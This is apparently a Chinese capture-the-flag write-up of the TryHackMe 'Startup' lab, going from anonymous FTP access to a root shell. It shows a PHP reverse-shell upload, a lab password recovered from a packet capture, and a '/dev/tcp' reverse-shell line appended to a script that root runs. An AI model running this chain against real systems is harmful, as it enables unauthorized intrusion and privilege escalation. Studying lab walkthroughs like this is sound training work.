免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

服务扫描

rootkali)-[~]└─# nmap -sV -Pn 10.10.171.61                           Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDTNmap scan report for 10.10.171.61Host is up (0.32s latency).Not shown: 997 closed portsPORT   STATE SERVICE VERSION21/tcp open  ftp     vsftpd 3.0.322/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds

开启了ftp,ssh,http服务

匿名登录ftp

┌──(rootkali)-[~/tryhackme/Startup]└─# ftp 10.10.171.61Connected to 10.10.171.61.220 (vsFTPd 3.0.3)Name (10.10.171.61:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh200 PORT command successful. Consider using PASV.150 Here comes the directory listing.drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 .drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 ..-rw-r--r--    1 0        0               5 Nov 12  2020 .test.logdrwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt226 Directory send OK.

所有文件下载到本地剖析，ftp文件夹外面没有任何货色，然而这个文件夹是可写的。

notice.txt内容

┌──(rootkali)-[~/tryhackme/Startup]└─# cat notice.txt Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

maya可能是个ssh用户名？

important.jpg显示两行文字

Everybody asks who's the impostorbut nobody asks how's the impostor

没看明确有啥有用的信息。

浸透80端口

关上80服务看看，显示一段话：

No spice here!Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!— Dev Team

网页源代码里有一行正文：

when are we gonna update this??

目录爆破看看

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61                                                                                     _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )                                                                     Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txtError Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.logTarget: http://10.10.171.61/[03:07:45] Starting:  [03:08:41] 301 -  312B  - /files  ->  http://10.10.171.61/files/            [03:08:42] 200 -    1KB - /files/                                           [03:08:47] 200 -  808B  - /index.html                                       

存在一个files文件夹，文件目录显示和ftp上是一样的。那浸透思路就很简略，间接ftp上传webshell到服务器，在web上拜访触犯反弹shell,方才咱们曾经晓得，ftp文件夹是可写的

ftp上传webshell

┌──(rootkali)-[~/tryhackme/Startup]└─# ftp 10.10.171.61Connected to 10.10.171.61.220 (vsFTPd 3.0.3)Name (10.10.171.61:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd ftp250 Directory successfully changed.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.226 Directory send OK.ftp> put /root/reverse-shell.php ./shell.phplocal: /root/reverse-shell.php remote: ./shell.php200 PORT command successful. Consider using PASV.150 Ok to send data.226 Transfer complete.3460 bytes sent in 0.00 secs (28.6932 MB/s)

触发反弹，拿到webshell

┌──(rootkali)-[~/tryhackme/Startup]└─# nc -lnvp 1234                                       listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 07:14:50 up 24 min,  0 users,  load average: 0.00, 0.01, 0.00USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)$ whoamiwww-data

根目录找到一个文件recipe.txt

www-data@startup:/$ cat recipe.txt cat recipe.txt Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

What is the secret spicy soup recipe?

love

横向提权到lennie

查看home目录，发现存在一个用户：lennie，然而咱们没有查看文件夹的权限
查看/etc/passwd/，发现另一个用户：vagrant

根目录还有一个文件夹incidents，所有者是www-data，外面有一个文件suspicious.pcapng,传回kali剖析

用wirksharp查看数据包，貌似是上一手黑客的网络交互信息
在第177个数据片留下了lennie的明码

c4ntg3t3n0ughsp1c3

拿到user.txt

www-data@startup:/tmp$ su lenniesu lenniePassword: c4ntg3t3n0ughsp1c3lennie@startup:/tmp$ cd /homecd /homelennie@startup:/home$ lslslennielennie@startup:/home$ cd lenniecd lennielennie@startup:~$ lslsDocuments  scripts  user.txt

提权到root

咱们查看scripts文件夹以及外面的脚本

lennie@startup:~$ cd scriptscd scriptslennie@startup:~/scripts$ ls -alhls -alhtotal 16Kdrwxr-xr-x 2 root   root   4.0K Nov 12  2020 .drwx------ 6 lennie lennie 4.0K Nov  6 08:43 ..-rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh-rw-r--r-- 1 root   root      1 Nov  6 08:57 startup_list.txtlennie@startup:~/scripts$ cat planner.sh cat planner.sh #!/bin/bashecho $LIST > /home/lennie/scripts/startup_list.txt/etc/print.shlennie@startup:~/scripts$ cat /etc/print.shcat /etc/print.sh#!/bin/bashecho "Done!"lennie@startup:~/scripts$ ls -alh /etc/print.shls -alh /etc/print.sh-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

剖析

planner.sh这个文件属于root，按文件名来看属于某种定时工作，普通用户对于这个文件没有写权限。然而这个脚本调用了另一个脚本/etc/print.sh，这个脚本的属组是lennie。也就是说咱们能够把反弹shell写进这个脚本

攻打

写脚本到/etc/print.sh

lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh<cho "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh           lennie@startup:~/scripts$ cat /etc/print.shcat /etc/print.sh#!/bin/bashecho "Done!"bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

开启监听，等大概一分钟，拿到root权限

┌──(rootkali)-[~/tryhackme/Startup]└─# nc -lnvp 4242                                                                           listening on [any] 4242 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342bash: cannot set terminal process group (2909): Inappropriate ioctl for devicebash: no job control in this shellroot@startup:~# ididuid=0(root) gid=0(root) groups=0(root)root@startup:~# cat /root/root.txtcat /root/root.txt